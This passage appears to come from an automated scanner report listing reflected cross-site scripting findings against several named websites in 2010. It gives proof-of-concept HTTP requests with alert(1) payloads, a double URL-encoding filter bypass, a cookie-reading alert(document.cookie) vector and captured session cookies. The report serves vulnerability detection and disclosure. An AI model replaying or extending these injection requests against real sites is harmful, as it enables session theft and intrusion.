This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /MCIndex.asp?c00fc"-alert(1)-"b0f823cffe6=1 HTTP/1.1
Host: info.bisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 14:57:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 394
Content-Type: text/html
Set-Cookie: MCIDtype=external; expires=Sat, 15-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: MCIDCookie=9505; expires=Sat, 15-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACSQAQAR=BLGOFMPAPAGFDCNPLOKOFCMM; path=/
Cache-control: private


<html>
<head>
<meta name="GENERATOR" content="Microsoft Visual Studio 6.0">
</head>
<body>
<script language=javascript>
<!--
   var strRedir = "http://www.EducatorEducation.com/?source=196337ZX1&univ=ua&c00fc"-alert(1)-"b0f823cffe6=1";
   if(document.referrer) strRedir += "&origref=" + escape(document.referrer);
   document.location.replace(strRedir);
//-->
...[SNIP]...

2.262. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eff7c"><script>alert(1)</script>f923b4feb1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?eff7c"><script>alert(1)</script>f923b4feb1b=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 16 Dec 2010 14:57:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&eff7c"><script>alert(1)</script>f923b4feb1b=1" type="text/css" media="all" />
...[SNIP]...

2.263. http://jsc.madisonlogic.com/jsc [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jsc.madisonlogic.com
Path:   /jsc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a8bdc<script>alert(1)</script>a598a4a7645 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsc?a8bdc<script>alert(1)</script>a598a4a7645=1 HTTP/1.1
Host: jsc.madisonlogic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 14:57:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 16 Dec 2010 14:57:44 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 69

// Error: Unknown parameter a8bdc<script>alert(1)</script>a598a4a7645

2.264. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.crainsnewyork.com
Path:   /player/playlist.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69ade'-alert(1)-'2ede3737740 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player69ade'-alert(1)-'2ede3737740/playlist.php HTTP/1.1
Host: media.crainsnewyork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5891553.1292505071.1.1.utmcsr=crain.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=c9b89455fc212a3647a1d11e3c3feabe; PBCSSESSIONID=373412229477322; OAX=rnneEk0KD/kAA2R8; __utma=5891553.1000867368.1292505071.1292505071.1292505071.1; __utmc=5891553; __qca=P0-183983675-1292505070639; __utmb=5891553.13.10.1292505071; PBCSPERMUSERID=373412229477322;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:58:11 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<title> - - </title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1
...[SNIP]...
ealMedia/ads/';
       //OAS_url = 'http://oas-central.realmedia.com/RealMedia/ads/';
       //OAS_sitepage = window.location.hostname + window.location.pathname;
       OAS_sitepage = 'www.crainsny.com/video//player69ade'-alert(1)-'2ede3737740/playlist.php';
       OAS_listpos = 'Middle1,Bottom1';
       OAS_query = '';
       OAS_target = '_blank';
       //end of configuration
       OAS_version = 10;
       //OAS_rn = '001234567890'; OAS_rns = '1234567890';
       //OAS_
...[SNIP]...

2.265. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.crainsnewyork.com
Path:   /player/playlist.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ea96<script>alert(1)</script>92b0d100679 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /player2ea96<script>alert(1)</script>92b0d100679/playlist.php HTTP/1.1
Host: media.crainsnewyork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5891553.1292505071.1.1.utmcsr=crain.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=c9b89455fc212a3647a1d11e3c3feabe; PBCSSESSIONID=373412229477322; OAX=rnneEk0KD/kAA2R8; __utma=5891553.1000867368.1292505071.1292505071.1292505071.1; __utmc=5891553; __qca=P0-183983675-1292505070639; __utmb=5891553.13.10.1292505071; PBCSPERMUSERID=373412229477322;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:58:11 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<title> - - </title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1
...[SNIP]...
b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0200u";hbx.gn="EHG-CRAIN.HITBOX.COM";
//BEGIN EDITABLE SECTION
hbx.acct="DM53030709ZD83EN3";//ACCOUNT NUMBER(S)
hbx.mlc = '/video/';
hbx.pn='player2ea96<script>alert(1)</script>92b0d100679/playlist.php';
hbx.pndef="title";
hbx.ctdef="full";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.elf="n";
hbx.seg="";
hbx.cp="null";
hbx.cmpn="MHCMP";
hbx.gpn="MHGP";
</script>
...[SNIP]...

2.266. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.crainsnewyork.com
Path:   /player/playlist.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 96d9b<script>alert(1)</script>6e0e344090b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /player/playlist.php96d9b<script>alert(1)</script>6e0e344090b HTTP/1.1
Host: media.crainsnewyork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5891553.1292505071.1.1.utmcsr=crain.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=c9b89455fc212a3647a1d11e3c3feabe; PBCSSESSIONID=373412229477322; OAX=rnneEk0KD/kAA2R8; __utma=5891553.1000867368.1292505071.1292505071.1292505071.1; __utmc=5891553; __qca=P0-183983675-1292505070639; __utmb=5891553.13.10.1292505071; PBCSPERMUSERID=373412229477322;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:58:14 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<title> - - </title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1
...[SNIP]...
b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0200u";hbx.gn="EHG-CRAIN.HITBOX.COM";
//BEGIN EDITABLE SECTION
hbx.acct="DM53030709ZD83EN3";//ACCOUNT NUMBER(S)
hbx.mlc = '/video/';
hbx.pn='player/playlist.php96d9b<script>alert(1)</script>6e0e344090b';
hbx.pndef="title";
hbx.ctdef="full";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.elf="n";
hbx.seg="";
hbx.cp="null";
hbx.cmpn="MHCMP";
hbx.gpn="MHGP";
</script>
...[SNIP]...

2.267. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.crainsnewyork.com
Path:   /player/playlist.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56746'-alert(1)-'3858b0910ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/playlist.php56746'-alert(1)-'3858b0910ea HTTP/1.1
Host: media.crainsnewyork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5891553.1292505071.1.1.utmcsr=crain.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=c9b89455fc212a3647a1d11e3c3feabe; PBCSSESSIONID=373412229477322; OAX=rnneEk0KD/kAA2R8; __utma=5891553.1000867368.1292505071.1292505071.1292505071.1; __utmc=5891553; __qca=P0-183983675-1292505070639; __utmb=5891553.13.10.1292505071; PBCSPERMUSERID=373412229477322;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:58:13 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<title> - - </title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1
...[SNIP]...
';
       //OAS_url = 'http://oas-central.realmedia.com/RealMedia/ads/';
       //OAS_sitepage = window.location.hostname + window.location.pathname;
       OAS_sitepage = 'www.crainsny.com/video//player/playlist.php56746'-alert(1)-'3858b0910ea';
       OAS_listpos = 'Middle1,Bottom1';
       OAS_query = '';
       OAS_target = '_blank';
       //end of configuration
       OAS_version = 10;
       //OAS_rn = '001234567890'; OAS_rns = '1234567890';
       //OAS_rn = new Stri
...[SNIP]...

2.268. http://media.pcadvisor.co.uk/graphics/icons/digg.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.pcadvisor.co.uk
Path:   /graphics/icons/digg.ico

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload d2e34--><script>alert(1)</script>04bd67f681a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /graphics/icons/digg.icod2e34--><script>alert(1)</script>04bd67f681a HTTP/1.1
Host: media.pcadvisor.co.uk
Proxy-Connection: keep-alive
Referer: http://www.pcadvisor.co.uk/news/index.cfm?newsid=3253825&rss&69011%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9de57f216aa=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 14:58:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=25774517;expires=Sat, 08-Dec-2040 14:58:28 GMT;path=/
Set-Cookie: CFTOKEN=db64a13e04e3b841-EFB0762D-24E8-5498-9BD76E8771E98767;expires=Sat, 08-Dec-2040 14:58:28 GMT;path=/
Set-Cookie: JSESSIONID=f23052365a96f7339090214d767553170523;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   
    <head>
       <t
...[SNIP]...
<!--http://www.pcadvisor.co.uk:80/graphics/icons/digg.icod2e34--><script>alert(1)</script>04bd67f681a-->
...[SNIP]...

2.269. http://media.pcadvisor.co.uk/graphics/icons/slashdot.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://media.pcadvisor.co.uk
Path:   /graphics/icons/slashdot.ico

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 9a474-->956dc082084 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /graphics/icons9a474-->956dc082084/slashdot.ico HTTP/1.1
Host: media.pcadvisor.co.uk
Proxy-Connection: keep-alive
Referer: http://www.pcadvisor.co.uk/news/index.cfm?newsid=3253825&rss&69011%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9de57f216aa=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 14:58:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=25772930;expires=Sat, 08-Dec-2040 14:58:01 GMT;path=/
Set-Cookie: CFTOKEN=c8a6102a81871d2f-EFB00F9E-24E8-5498-9B0C521FA0472181;expires=Sat, 08-Dec-2040 14:58:01 GMT;path=/
Set-Cookie: JSESSIONID=3a306c5729decd0825e41d52359705d757d4;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   
    <head>
       <t
...[SNIP]...
<!--http://www.pcadvisor.co.uk:80/graphics/icons9a474-->956dc082084/slashdot.ico-->
...[SNIP]...

2.270. http://media.pcadvisor.co.uk/scripts/pca.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://media.pcadvisor.co.uk
Path:   /scripts/pca.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 28fa5--><a>9b1dee05bf7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /scripts/pca.js28fa5--><a>9b1dee05bf7 HTTP/1.1
Host: media.pcadvisor.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=2214449.1292508562.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/32; __utma=2214449.1299671062.1292508562.1292508562.1292508562.1; __utmc=2214449; __qca=P0-1520383801-1292508602935; __utmb=2214449.1.10.1292508562;

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 14:58:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=25774501;expires=Sat, 08-Dec-2040 14:58:21 GMT;path=/
Set-Cookie: CFTOKEN=b7d172a67d94fa17-EFB05C62-24E8-5498-9B711B3B55C40E86;expires=Sat, 08-Dec-2040 14:58:21 GMT;path=/
Set-Cookie: JSESSIONID=f2307d3bba30c2a08a95773143236b10356f;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   
    <head>
       <t
...[SNIP]...
<!--http://www.pcadvisor.co.uk:80/scripts/pca.js28fa5--><a>9b1dee05bf7-->
...[SNIP]...

2.271. http://media.pcadvisor.co.uk/styles/facebox.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.pcadvisor.co.uk
Path:   /styles/facebox.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 4733d--><script>alert(1)</script>94a5f4d2783 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /styles/4733d--><script>alert(1)</script>94a5f4d2783 HTTP/1.1
Host: media.pcadvisor.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=2214449.1292508562.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/32; __utma=2214449.1299671062.1292508562.1292508562.1292508562.1; __utmc=2214449; __qca=P0-1520383801-1292508602935; __utmb=2214449.1.10.1292508562;

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 14:58:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=25772972;expires=Sat, 08-Dec-2040 14:58:20 GMT;path=/
Set-Cookie: CFTOKEN=9b0dc19f890d8baa-EFB059A0-24E8-5498-9BEEF764F31AA882;expires=Sat, 08-Dec-2040 14:58:20 GMT;path=/
Set-Cookie: JSESSIONID=3a30a9aa15a48d1555222e4a56453c2356a2;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   
    <head>
       <t
...[SNIP]...
<!--http://www.pcadvisor.co.uk:80/styles/4733d--><script>alert(1)</script>94a5f4d2783-->
...[SNIP]...

2.272. http://media.pcadvisor.co.uk/styles/pcamac.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://media.pcadvisor.co.uk
Path:   /styles/pcamac.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload de645-->16d9153269f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /styles/pcamac.cssde645-->16d9153269f HTTP/1.1
Host: media.pcadvisor.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=2214449.1292508562.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/32; __utma=2214449.1299671062.1292508562.1292508562.1292508562.1; __utmc=2214449; __qca=P0-1520383801-1292508602935; __utmb=2214449.1.10.1292508562;

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 14:58:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=25774492;expires=Sat, 08-Dec-2040 14:58:18 GMT;path=/
Set-Cookie: CFTOKEN=7019de5724484f24-EFB05026-24E8-5498-9B81044F281F0899;expires=Sat, 08-Dec-2040 14:58:18 GMT;path=/
Set-Cookie: JSESSIONID=f2303c3e748b659240472d2ff1d35d685e13;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   
    <head>
       <t
...[SNIP]...
<!--http://www.pcadvisor.co.uk:80/styles/pcamac.cssde645-->16d9153269f-->
...[SNIP]...

2.273. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000223/00056590007964CIO58HH9JQ1JV/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a539%2522%253balert%25281%2529%252f%252f52016fcd1ec was submitted in the REST URL parameter 2. This input was echoed as 2a539";alert(1)//52016fcd1ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/2000002232a539%2522%253balert%25281%2529%252f%252f52016fcd1ec/00056590007964CIO58HH9JQ1JV/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "3d8cd694aec39073090d8d1eef866e28"
X-Runtime: 73
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 2988
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
           var reg_url = "http://reg.idgenterprise.com/reg/cio/form/2000002232a539";alert(1)//52016fcd1ec?SOURCE=00056590007964CIO58HH9JQ1JV&sHdr=1&codetype=g&pagename=pageName|UNKNOWN&pagetype=prop14|UNKNOWN" + "&elqguid=" + elqCustomerGUID;
           document.write('<iframe src="'+ reg_url +'" width="700" hei
...[SNIP]...

2.274. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000223/00056590007964CIO58HH9JQ1JV/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 154c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e349839c022 was submitted in the REST URL parameter 2. This input was echoed as 154c9"><script>alert(1)</script>349839c022 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/154c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e349839c022/00056590007964CIO58HH9JQ1JV/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "749373979229e256043f96ef56f46da7"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3823
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<iframe src="http://www.accelacomm.com/jaw/00056590007964CIO58HH9JQ1JV/7/154c9"><script>alert(1)</script>349839c022/" width="700" height="1450" style="position:relative;left:0px;top:0px;" frameborder="no" border="0" marginheight="0" marginwidth="0" scrolling="no">
...[SNIP]...

2.275. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000223/00056590007964CIO58HH9JQ1JV/

Issue detail

